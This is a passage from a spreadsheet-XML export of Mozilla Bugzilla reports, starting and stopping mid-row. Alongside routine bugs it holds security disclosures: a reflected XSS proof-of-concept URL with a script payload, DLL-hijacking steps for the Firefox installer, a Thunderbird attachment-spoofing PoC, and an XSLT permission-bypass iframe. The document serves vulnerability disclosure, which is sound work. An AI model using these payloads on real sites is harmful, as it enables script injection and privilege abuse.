Build Identifier: 
http://hacks.mozilla.org - xss on all parameters/categories where you see "?"
POC: 
http://hacks.mozilla.org/2011/03/?"&gt;&lt;marquee&gt;&lt;h1&gt;XSS&lt;/h1&gt;&lt;/marquee&gt;--&gt;&lt;script&gt;alert('XSS-HACK?')&lt;/script&gt;--&gt; 
SEE:  
http://img691.imageshack.us/f/marzt.jpg/
Reproducible: Always</t>
        </is>
      </c>
      <c r="X2873" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2874">
      <c r="A2874" t="n">
        <v>521463</v>
      </c>
      <c r="B2874" t="inlineStr">
        <is>
          <t>2009-10-09 12:14:49 -0700</t>
        </is>
      </c>
      <c r="C2874" t="inlineStr">
        <is>
          <t>text input fields are different widths on enter_bug.cgi, process_bug.cgi and post_bug.cgi</t>
        </is>
      </c>
      <c r="D2874" t="inlineStr">
        <is>
          <t>2010-07-12 19:17:52 -0700</t>
        </is>
      </c>
      <c r="E2874" t="n">
        <v>1</v>
      </c>
      <c r="F2874" t="n">
        <v>1</v>
      </c>
      <c r="G2874" t="n">
        <v>4</v>
      </c>
      <c r="H2874" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2874" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2874" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K2874" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2874" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2874" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2874" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2874" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2874" t="inlineStr"/>
      <c r="Q2874" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2874" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S2874" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T2874" t="n">
        <v>1</v>
      </c>
      <c r="U2874" t="n">
        <v>0</v>
      </c>
      <c r="V2874" t="n">
        <v>6</v>
      </c>
      <c r="W2874" t="inlineStr">
        <is>
          <t>Created attachment 405543
Patch to add bodyclasses to process_bug.cgi and post_bug.cgi (v1)
bug/show.html.tmpl includes additional bodyclasses that use CSS to format the text input fields to min: 25em and width: 100%. bug/process/header.html.tmpl and bug/create/created.html.tmpl do not include the additional bodyclasses and so therefore the text input fields are smaller at size=40. 
Needs to be consistent for all views of bug/edit.html.tmpl.
Attaching patch.
Dave</t>
        </is>
      </c>
      <c r="X2874" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2875">
      <c r="A2875" t="n">
        <v>1361326</v>
      </c>
      <c r="B2875" t="inlineStr">
        <is>
          <t>2017-05-02 04:19:34 -0700</t>
        </is>
      </c>
      <c r="C2875" t="inlineStr">
        <is>
          <t>DLL Hijacking Firefox installer</t>
        </is>
      </c>
      <c r="D2875" t="inlineStr">
        <is>
          <t>2024-05-30 09:32:44 -0700</t>
        </is>
      </c>
      <c r="E2875" t="n">
        <v>1</v>
      </c>
      <c r="F2875" t="n">
        <v>1</v>
      </c>
      <c r="G2875" t="n">
        <v>2</v>
      </c>
      <c r="H2875" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2875" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2875" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K2875" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L2875" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2875" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2875" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2875" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2875" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+] local attack</t>
        </is>
      </c>
      <c r="Q2875" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2875" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2875" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T2875" t="n">
        <v>1</v>
      </c>
      <c r="U2875" t="n">
        <v>0</v>
      </c>
      <c r="V2875" t="n">
        <v>38</v>
      </c>
      <c r="W2875" t="inlineStr">
        <is>
          <t>Created attachment 8863692
dll.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36
Steps to reproduce:
1.Create a malicious BCRYPT.dll file and save it in your "Downloads" directory.
2.Download 'Firefox Setup Stub 53.0.exe' and save it in your "Downloads" directory.
3.Execute 'Firefox Setup Stub 53.0.exe' from your "Downloads" directory.
4.Malicious dll file gets executed.
Actual results:
trojan DLL loads cmd.exe and alert the dialog 
Expected results:
DLL file on a Windows computer is placed in the default downloads directory with the Firefox installer, the Firefox installer will load this DLL when it is launched. In circumstances where the installer is run by an administrator privileged account, this allows for the downloaded DLL file to be run with administrator privileges. This can lead to arbitrary code execution from a privileged account.</t>
        </is>
      </c>
      <c r="X2875" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2876">
      <c r="A2876" t="n">
        <v>1243464</v>
      </c>
      <c r="B2876" t="inlineStr">
        <is>
          <t>2016-01-27 10:43:11 -0800</t>
        </is>
      </c>
      <c r="C2876" t="inlineStr">
        <is>
          <t>Use of uninitialised memory in [@graphite2::TtfUtil::GetTableInfo]</t>
        </is>
      </c>
      <c r="D2876" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:43 -0700</t>
        </is>
      </c>
      <c r="E2876" t="n">
        <v>1</v>
      </c>
      <c r="F2876" t="n">
        <v>1</v>
      </c>
      <c r="G2876" t="n">
        <v>3</v>
      </c>
      <c r="H2876" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2876" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2876" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K2876" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2876" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2876" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2876" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2876" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2876" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q2876" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2876" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2876" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2876" t="n">
        <v>1</v>
      </c>
      <c r="U2876" t="n">
        <v>0</v>
      </c>
      <c r="V2876" t="n">
        <v>5</v>
      </c>
      <c r="W2876" t="inlineStr">
        <is>
          <t>Created attachment 8712774
test_case.ttf
This was found while fuzzing graphite2 1.3.5 (and is in 1.3.4)
Conditional jump or move depends on uninitialised value(s)
   at 0x4E69D01: graphite2::TtfUtil::GetTableInfo(graphite2::TtfUtil::Tag, void const*, void const*, unsigned long&amp;, unsigned long&amp;) (TtfUtil.cpp:213)
   by 0x4E6B578: graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) (FileFace.cpp:83)
   by 0x4E511FD: graphite2::Face::Table::Table(graphite2::Face const&amp;, graphite2::TtfUtil::Tag, unsigned int) (Face.cpp:281)
   by 0x4E3E741: (anonymous namespace)::load_face(graphite2::Face&amp;, unsigned int) (gr_face.cpp:49)
   by 0x4E3E92B: gr_make_face_with_ops (gr_face.cpp:89)
   by 0x4E3EF12: gr_make_file_face (gr_face.cpp:242)
   by 0x404CE4: Gr2Face::Gr2Face(char const*, std::string const&amp;, bool) (Gr2Renderer.h:37)
   by 0x40359F: main (CompareRenderer.cpp:324)</t>
        </is>
      </c>
      <c r="X2876" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2877">
      <c r="A2877" t="n">
        <v>504342</v>
      </c>
      <c r="B2877" t="inlineStr">
        <is>
          <t>2009-07-15 09:37:10 -0700</t>
        </is>
      </c>
      <c r="C2877" t="inlineStr">
        <is>
          <t>Investigate milw0rm 9158 "unicode stack overflow"</t>
        </is>
      </c>
      <c r="D2877" t="inlineStr">
        <is>
          <t>2022-10-10 15:36:44 -0700</t>
        </is>
      </c>
      <c r="E2877" t="n">
        <v>1</v>
      </c>
      <c r="F2877" t="n">
        <v>1</v>
      </c>
      <c r="G2877" t="n">
        <v>3</v>
      </c>
      <c r="H2877" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2877" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2877" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K2877" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L2877" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2877" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2877" t="inlineStr">
        <is>
          <t>NEW</t>
        </is>
      </c>
      <c r="O2877" t="inlineStr"/>
      <c r="P2877" t="inlineStr">
        <is>
          <t>Win:new throws on oom; Mac: crash in Apple routines (like Safari)</t>
        </is>
      </c>
      <c r="Q2877" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2877" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2877" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2877" t="n">
        <v>1</v>
      </c>
      <c r="U2877" t="n">
        <v>9</v>
      </c>
      <c r="V2877" t="n">
        <v>44</v>
      </c>
      <c r="W2877" t="inlineStr">
        <is>
          <t>I noticed this on milw0rm today
http://www.milw0rm.com/exploits/9158
I'm setting this to security sensitive for now, but the exploit report is public so the bug might not need to be closed.
Thanks Mike Beltzner for helping me to file my first security bug :)</t>
        </is>
      </c>
      <c r="X2877" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2878">
      <c r="A2878" t="n">
        <v>300246</v>
      </c>
      <c r="B2878" t="inlineStr">
        <is>
          <t>2005-07-10 00:36:34 -0700</t>
        </is>
      </c>
      <c r="C2878" t="inlineStr">
        <is>
          <t>Spoofing via attachment dragging</t>
        </is>
      </c>
      <c r="D2878" t="inlineStr">
        <is>
          <t>2008-03-25 10:20:49 -0700</t>
        </is>
      </c>
      <c r="E2878" t="n">
        <v>1</v>
      </c>
      <c r="F2878" t="n">
        <v>1</v>
      </c>
      <c r="G2878" t="n">
        <v>2</v>
      </c>
      <c r="H2878" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2878" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J2878" t="inlineStr">
        <is>
          <t>Mail Window Front End</t>
        </is>
      </c>
      <c r="K2878" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L2878" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2878" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2878" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2878" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2878" t="inlineStr">
        <is>
          <t>[sg:spoof][approval‑seamonkey1.1.3+]</t>
        </is>
      </c>
      <c r="Q2878" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2878" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2878" t="inlineStr">
        <is>
          <t>Thunderbird1.1</t>
        </is>
      </c>
      <c r="T2878" t="n">
        <v>1</v>
      </c>
      <c r="U2878" t="n">
        <v>0</v>
      </c>
      <c r="V2878" t="n">
        <v>17</v>
      </c>
      <c r="W2878" t="inlineStr">
        <is>
          <t>From Andreas Sandblad, Secunia Research
-- SA15907: Mozilla Thunderbird Attachment Spoofing Vulnerability --
Secunia Research has discovered a vulnerability in Thunderbird, which can be
exploited by malicious people to trick users into downloading malicious attachments.
The vulnerability is caused due to attachments not being displayed correctly in
mails. This can be exploited to spoof the file extension and the associated file
type icon via a combination of overly long filenames containing whitespaces and
"Content-Type" headers not matching the file extension.
Successful exploitation may lead to malware being saved to e.g. the desktop.
NOTE: Attachments can be saved by dragging the attachment or using the "Save
As..." or "Save All..." functionality. For files on the desktop the icon can be
spoofed if it e.g. is a ".exe" or ".lnk" file.
-- PoC (Proof of Concept) --
The raw mail source to be sent can be found in mail.txt (in poc.zip). It is
recommended to send it manually via a telnet session.
E.g:
telnet &lt;SMTP server&gt; 25
HELO &lt;SMTP server&gt;
MAIL FROM: &lt;FROM&gt;
RCPT TO: &lt;TO&gt;
DATA
&lt;mail.txt&gt;
.
QUIT
Open mail, drag attachment to desktop and double click on it (see attached
screendumps). "You are vulnerable!" should be displayed in a dos window.
--
The vulnerability has been confirmed in Thunderbird 1.0.2 for Windows. Other
versions may also be affected.
Discovered by: Andreas Sandblad, Secunia Research</t>
        </is>
      </c>
      <c r="X2878" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2879">
      <c r="A2879" t="n">
        <v>1551916</v>
      </c>
      <c r="B2879" t="inlineStr">
        <is>
          <t>2019-05-15 08:12:40 -0700</t>
        </is>
      </c>
      <c r="C2879" t="inlineStr">
        <is>
          <t>Optimize computing a column number as count of code points by caching column numbers (and whether each chunk might contain anything multi-unit) and counting forward from them</t>
        </is>
      </c>
      <c r="D2879" t="inlineStr">
        <is>
          <t>2019-06-06 12:17:38 -0700</t>
        </is>
      </c>
      <c r="E2879" t="n">
        <v>1</v>
      </c>
      <c r="F2879" t="n">
        <v>1</v>
      </c>
      <c r="G2879" t="n">
        <v>3</v>
      </c>
      <c r="H2879" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2879" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2879" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2879" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2879" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2879" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2879" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2879" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2879" t="inlineStr"/>
      <c r="Q2879" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2879" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2879" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T2879" t="n">
        <v>1</v>
      </c>
      <c r="U2879" t="n">
        <v>0</v>
      </c>
      <c r="V2879" t="n">
        <v>12</v>
      </c>
      <c r="W2879" t="inlineStr">
        <is>
          <t>Bug 1504947 made column numbers be counts of code points (at least til its final step was reverted in bug 1549758).  Because code points generally aren't all the same length, determining column numbers thus requires some sort of `O(n)` scan -- `O(n**2)` when it happens repeatedly.  Computations on the same line can avoid redoing work by counting forward from a prior offset.  But not all lookups are successive, and non-successive cases hit issues: bug 1545015, bug 1545034, bug 1546313 at minimum.
I've implemented a solution: for lines that are "long enough", lazily compute a vector of the column number at almost-regular intervals, then you can count only from the nearest column.  `--compileonly --file` with bug 1545034's testcase indicates this is effective.
There are a couple different axes of design space/implementation choice here.
First, chunk size.
128 could be any number that will fit the lengthiest code point (2/4 for UTF-8/16).  A smaller number reduces worst-case scanning (which can still be quadratic, just within a chunk) but costs more memory and has more overhead to populate the data structures.  I bet most non-minified lines are under 100ch, so 128 seems most reasonable.  (We could data-gather to support that; I don't think the effort is justified.)
Second, the vector elements.
Regular chunking may split code points, so you must round chunk beginnings down to the start of a code point.  This can be done every time a true boundary need be computed, or you could save the exact offset.  The memory cost of exact offset saving, when retracting to a code point boundary should be a few predictable instructions, IMO rules out offset-saving.  (I have a patch for this, tho, if we think different.)
A better thing to save in vector elements, IMO, is a bit that conservatively indicates whether a chunk is guaranteed to contain only single-unit code points.  Then the scanning cost is _only_ paid by chunks that _definitely_ contain multi-unit code points, or by an instantaneously-at-the-end chunk where we just can't know yet.  That one byte per chunk seems a much better cost to pay than four bytes per chunk for retracted offsets.
Anyway -- I'll post a patch where vector elements are column numbers only, a patch that adds in the guaranteed-single-unit bit too, and a patch that also stores the offset (that we probably don't want).  I also have a nice big ol' testcase -- written specifically for that 128-unit chunk size, to trigger behaviors and edge cases within it -- that seems to indicate things are okay.  (And it'd be easy enough to see how the test runs with various values for `ColumnChunkLength` besides 128, for scattershot testing -- at some point I tried it with value `7` for a way-too-low approach and it worked fine.)</t>
        </is>
      </c>
      <c r="X2879" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2880">
      <c r="A2880" t="n">
        <v>1390006</v>
      </c>
      <c r="B2880" t="inlineStr">
        <is>
          <t>2017-08-13 18:34:02 -0700</t>
        </is>
      </c>
      <c r="C2880" t="inlineStr">
        <is>
          <t>browser_BrowserUITelemetry_defaults.js is going to permafail on DevEdition when Gecko 57 merges to Beta on 2017-09-20</t>
        </is>
      </c>
      <c r="D2880" t="inlineStr">
        <is>
          <t>2017-08-29 02:56:46 -0700</t>
        </is>
      </c>
      <c r="E2880" t="n">
        <v>1</v>
      </c>
      <c r="F2880" t="n">
        <v>1</v>
      </c>
      <c r="G2880" t="n">
        <v>2</v>
      </c>
      <c r="H2880" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2880" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2880" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K2880" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2880" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2880" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2880" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2880" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2880" t="inlineStr">
        <is>
          <t>[photon-structure]</t>
        </is>
      </c>
      <c r="Q2880" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2880" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2880" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T2880" t="n">
        <v>1</v>
      </c>
      <c r="U2880" t="n">
        <v>0</v>
      </c>
      <c r="V2880" t="n">
        <v>9</v>
      </c>
      <c r="W2880" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]: Permafailing DevEdition test on the next merge day.
Looks like this test is failing because DevEdition has an extra button on the toolbar that the test isn't expecting to be there.
https://public-artifacts.taskcluster.net/Zym-tmX2Q_e03PFcEC_RVg/0/public/test_info//mozilla-test-fail-screenshot_aQrgTf.png
https://treeherder.mozilla.org/logviewer.html#?job_id=122811906&amp;repo=try
TEST-UNEXPECTED-FAIL | browser/modules/test/browser/browser_BrowserUITelemetry_defaults.js | ["developer-button"] deepEqual [] - JS frame :: chrome://mochitests/content/browser/browser/modules/test/browser/browser_BrowserUITelemetry_defaults.js :: test :: line 25</t>
        </is>
      </c>
      <c r="X2880" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2881">
      <c r="A2881" t="n">
        <v>1408990</v>
      </c>
      <c r="B2881" t="inlineStr">
        <is>
          <t>2017-10-16 05:33:30 -0700</t>
        </is>
      </c>
      <c r="C2881" t="inlineStr">
        <is>
          <t>Resource Timing API leaks URL after subframe navigation</t>
        </is>
      </c>
      <c r="D2881" t="inlineStr">
        <is>
          <t>2024-05-30 09:37:31 -0700</t>
        </is>
      </c>
      <c r="E2881" t="n">
        <v>1</v>
      </c>
      <c r="F2881" t="n">
        <v>1</v>
      </c>
      <c r="G2881" t="n">
        <v>3</v>
      </c>
      <c r="H2881" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2881" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2881" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2881" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2881" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2881" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2881" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2881" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2881" t="inlineStr">
        <is>
          <t>[adv-main57+][adv-esr52.5+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2881" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2881" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2881" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T2881" t="n">
        <v>1</v>
      </c>
      <c r="U2881" t="n">
        <v>0</v>
      </c>
      <c r="V2881" t="n">
        <v>44</v>
      </c>
      <c r="W2881" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Steps to reproduce:
1. Go to https://attack.shhnjk.com/resource_check.html
2. Wait for 3 seconds
Actual results:
Cross-origin URL after redirect is leaked.
Expected results:
This should not be leaked.</t>
        </is>
      </c>
      <c r="X2881" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2882">
      <c r="A2882" t="n">
        <v>1771685</v>
      </c>
      <c r="B2882" t="inlineStr">
        <is>
          <t>2022-05-29 18:31:34 -0700</t>
        </is>
      </c>
      <c r="C2882" t="inlineStr">
        <is>
          <t>Cross-origin frames can obtain top-level permissions b/c XSLT transform resets FeaturePolicy</t>
        </is>
      </c>
      <c r="D2882" t="inlineStr">
        <is>
          <t>2024-06-17 01:23:25 -0700</t>
        </is>
      </c>
      <c r="E2882" t="n">
        <v>1</v>
      </c>
      <c r="F2882" t="n">
        <v>1</v>
      </c>
      <c r="G2882" t="n">
        <v>3</v>
      </c>
      <c r="H2882" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2882" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2882" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K2882" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2882" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2882" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2882" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2882" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2882" t="inlineStr">
        <is>
          <t>[adv-main104+][adv-esr91.13+][adv-esr102.2+]</t>
        </is>
      </c>
      <c r="Q2882" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2882" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2882" t="inlineStr">
        <is>
          <t>105 Branch</t>
        </is>
      </c>
      <c r="T2882" t="n">
        <v>1</v>
      </c>
      <c r="U2882" t="n">
        <v>0</v>
      </c>
      <c r="V2882" t="n">
        <v>27</v>
      </c>
      <c r="W2882" t="inlineStr">
        <is>
          <t>Created attachment 9278689
Proof of concept to be loaded in a cross-origin iframe
Cross-origin children can obtain top-level permissions using XSLT because transformation effectively resets the document's FeaturePolicy.
### Impact
The attack potential is very similar to bug 1755081. An untrusted cross-origin `&lt;iframe&gt;` may hijack the top-level origin's permissions to access media devices like the webcam, or prompt for permissions in the top-level origin's name.
### Details
During XSL transformation, several properties of the *source document* are transferred to the *result document* in [`URIUtils::ResetWithSource()`](https://searchfox.org/mozilla-central/rev/1479b11f4e861d3e749d284f1d2048713a2dd78f/dom/xslt/base/txURIUtils.cpp#46-87). Currently this doesn't consider the document's FeaturePolicy.
However, it's necessary to explicitly set the correct FP here, because the result document never runs `Document::StartDocumentLoad()` =&gt; `Document::InitFeaturePolicy()` to set the policy itself. Hence, the FP remains at its permissive default which, in a nested context (viz. cross-origin iframe), is equivalent to a blanket delegation of all permissions by the top-level context.
### Proof of concept
Load the attached PoC in a cross-origin frame. Click the buttons to demo microphone/fullscreen access. Note that parent doesn't require HTTPS, but the PoC itself needs to be served securely so that `navigator.mediaDevices` is available.
The fullscreen case even works if HTML-sandboxed via e.g.:
```html
&lt;iframe sandbox="allow-scripts" src="https://untrusted.example/poc-with-acao-header.xml"&gt;&lt;/iframe&gt;
```</t>
        </is>
      </c>
      <c r="X2882" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2883">
      <c r="A2883" t="n">
        <v>122501</v>
      </c>
      <c r="B2883" t="inlineStr">
        <is>
          <t>2002-01-29 16:27:51 -0800</t>
        </is>
      </c>
      <c r="C2883" t="inlineStr">
        <is>
          <t>[viewpoint] keyboard events aren't passed to windowless plugin correctly</t>
        </is>
      </c>
      <c r="D2883" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E2883" t="n">
        <v>1</v>
      </c>
      <c r="F2883" t="n">
        <v>1</v>
      </c>
      <c r="G2883" t="n">
        <v>6</v>
      </c>
      <c r="H2883" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2883" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2883" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K2883" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2883" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2883" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2883" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2883" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2883" t="inlineStr"/>
      <c r="Q2883" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2883" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2883" t="inlineStr">
        <is>
          <t>mozilla0.9.9</t>
        </is>
      </c>
      <c r="T2883" t="n">
        <v>1</v>
      </c>
      <c r="U2883" t="n">
        <v>0</v>
      </c>
      <c r="V2883" t="n">
        <v>22</v>
      </c>
      <c r="W2883" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
BuildID:    0.9.4 branch
1) I only get keyboard events when I the plugin's page is in a frame.
View the following URL:
http://cole.viewpoint.com/~compuserve/bluestreak_testad2/
We get the keyboard events (NPP_HandleEvent is called)
View the following:
http://cole.viewpoint.com/~compuserve/bluestreak_testad2/bluestreak.htm
(exact same content, just not viewed through index, which creates the frame)
No keyboard events.
2) Note that either way, you will not see the effects of typing.
The second problem is that we are getting the wrong info in wparam and lparam.
Here is MSDN:
wParam - Specifies the virtual-key code of the nonsystem key. 
lParam - Specifies the repeat count, scan code, extended-key flag, context 
code, previous key-state flag, and transition-state flag, as shown in the 
following table. 
Here is your code in nsWindow.cpp line 2420:
  pluginEvent.wParam = 0;
  pluginEvent.wParam |= (event.isShift) ? MK_SHIFT : 0;
  pluginEvent.wParam |= (event.isControl) ? MK_CONTROL : 0;
  pluginEvent.lParam = aVirtualCharCode;
Looks to me like lParam is geting virtual char info, and wParam is getting 
shift and control info. First of all, I think they are flipped.  Second, is the 
shift and control info in the same form that WM_KEYDOWN or WM_KEYUP expects?
Reproducible: Always
---
Peter's comment from 116392:
I'll take a look at the frameset problem, but I don't see it in my simple
testcase. My key events get to my windowless plugin without a frameset after I
give the plugin focus by clicking in it's area. Perhaps that's the problem?
---
I assume it is not just framesets that would allow the events to get through- 
probably other things would do- maybe div tags?
You should be able to reproduce the problem at the URL that I gave.
I did make sure to give the window the focus first.
I will try your patch for flipping lParam and wParam.</t>
        </is>
      </c>
      <c r="X2883" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2884">
      <c r="A2884" t="n">
        <v>1306890</v>
      </c>
      <c r="B2884" t="inlineStr">
        <is>
          <t>2016-10-01 11:18:26 -0700</t>
        </is>
      </c>
      <c r="C2884" t="inlineStr">
        <is>
